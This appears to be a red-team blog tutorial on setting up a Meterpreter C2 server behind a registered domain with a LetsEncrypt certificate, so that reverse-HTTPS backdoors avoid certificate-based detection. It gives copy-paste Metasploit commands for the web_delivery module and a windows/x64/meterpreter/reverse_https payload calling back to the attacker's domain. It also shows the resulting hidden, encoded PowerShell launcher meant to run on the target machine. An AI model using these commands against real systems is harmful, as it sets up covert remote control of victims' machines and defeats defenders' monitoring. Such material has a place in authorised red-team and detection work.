STOP USING DEFAULT SSL CERTIFICATES
By default, Meterpreter creates custom SSL certificates to encrypt traffic between the target and your C2 server if you turn on SSL. However, these custom SSL certificates contain fingerprintable data that enables Hunters to easily detect your backdoor.
Obviously, with SSL Termination (or SSL offloading), Hunters would be able to read and interpret the data stream, but this technique is computationally intensive work and therefore — most of the time — requires a separate device. Anyway, at the time of writing, SSL Termination is not used very often because of the costs involved or immaturity of the organization.
Back to Meterpreter.
1. Register a domain
First, register a domain for your C2 server or create a subdomain on an existing domain. This is not only a mandatory step for a valid SSL certificate, but it also allows you to move your C2 infrastructure to another hosting company or IP address. With just one DNS update, all of your backdoors will be able to find your C2 server.
2. Use LetsEncrypt to create an SSL certificate
To avoid detection because of fingerprintable SSL certificates, you should create your own custom SSL certificates. Luckily, that’s where LetsEncrypt comes in. A nonprofit Certificate Authority providing TLS certificates to 260 million websites for free (!).
- Go to certbot.eff.org
- For software, choose
None of the above
- For system, choose your OS. In my case:
- Follow the instructions to install Certbot on your C2 server
- Then, request a certificate using the
# certbot certonly --standalone -d YOURDOMAINHERE
- If everything went okay, your certificate should be in this directory:
To make this brand new certificate ready for Meterpreter, we need to merge the certificate with its private key.
- Create a directory to save the custom certificate in:
# mkdir /opt/ssl
- Concatenate the LetsEncrypt certificate and private key:
# cat /etc/letsencrypt/live/YOURDOMAINHERE/privkey.pem /etc/letsencrypt/live/YOURDOMAINHERE/fullchain.pem > /opt/ssl/unified.pem
You could increase your OpSec by using Cloudflare instead of LetsEncrypt. The downside is that you can only use WEB ports for your C2 connections because Cloudflare only forwards WEB traffic to your IP address.
3. Meterpreter Magic
Okay, now that you’ve set up all the preliminaries, we can finally get into Meterpreter. For this example, I am going to use Meterpreter module
exploit/multi/script/web_delivery and payload
In the image above, you’ll see SSL options in the ‘Module’ section but none in the ‘Payload’ section. Now, if you’re somewhat familiar with Meterpreter, you know that there are some ‘advanced’ options. One particularly important option to avoid detection is
HandlerSSLCert. This option will override the default (automagically generated, fingerprintable SSL certificate) by setting your own SSL certificate for the 'stager'.
Don’t forget to enable checking of this certificate by setting
Okay, here are the commands if you’re looking for a copy/paste:
set payload windows/x64/meterpreter/reverse_https
set sslcert /opt/ssl/unified.pem
set ssl true
set srvport 80
set lhost YOURDOMAINHERE
set lport 443
set HandlerSSLCert /opt/ssl/unified.pem
set StagerVerifySSLCert true
set target 2
exploit -j -z
Notice that it looks like I set the same certificate twice. That’s correct. One time for the listener and one time to be used by the stager connection.
After running the last command (
exploit -j -z), you'll get the Powershell command to run on the target machine:
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started HTTPS reverse handler on https://0.0.0.0:443
[*] Using URL: https://0.0.0.0:80/RaNdOmStRiNg
[*] Local IP: https://0.0.0.0:80/RaNdOmStRiNg
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e VGhpcyBpcyBqdXN0IGFuIGV4YW1wbGUuIFRoaXMgaXMganVzdCBhbiBleGFtcGxlLiBUaGlzIGlzIGp1c3QgYW4gZXhhbXBsZS4gVGhpcyBpcyBqdXN0IGFuIGV4YW1wbGUuIFRoaXMgaXMganVzdCBhbiBleGFtcGxlLiBUaGlzIGlzIGp1c3QgYW4gZXhhbXBsZS4gVGhpcyBpcyBqdXN0IGFuIGV4YW1wbGUuIFRoaXMgaXMganVzdCBhbiBleGFtcGxlLiBUaGlzIGlzIGp1c3QgYW4gZXhhbXBsZS4gVGhpcyBpcyBqdXN0IGFuIGV4YW1wbGUuIFRoaXMgaXMganVzdCBhbiBleGFtcGxlLiBUaGlzIGlzIGp1c3QgYW4gZXhhbXBsZS4gVGhpcyBpcyBqdXN0IGFuIGV4YW1wbGUuIFRoaXMgaXMganVzdCBhbiBleGFtcGxlLiBUaGlzIGlzIGp1c3QgYW4gZXhhbXBsZS4gVGhpcyBpcyBqdXN0IGFuIGV4YW1wbGUuIFRoaXMgaXMganVzdCBhbiBleGFtcGxlLiA=
Now, open your browser and go to https://YOURDOMAINHERE:443. The SSL connection will be valid and it will show the LetsEncrypt certificate you set up.
RED TEAM TUTORIALS
With the ongoing shift from Red Teaming to Purple Teaming, Hunters (or: Blue Teamers) are becoming smarter in spotting and countering attacks from Hackers. The reason? Hackers and Hunters are finally learning from each other.
This tutorial is one of a few, written for Hackers to better hide your backdoors from Hunters. Check out my Medium page for more Red Team tutorials.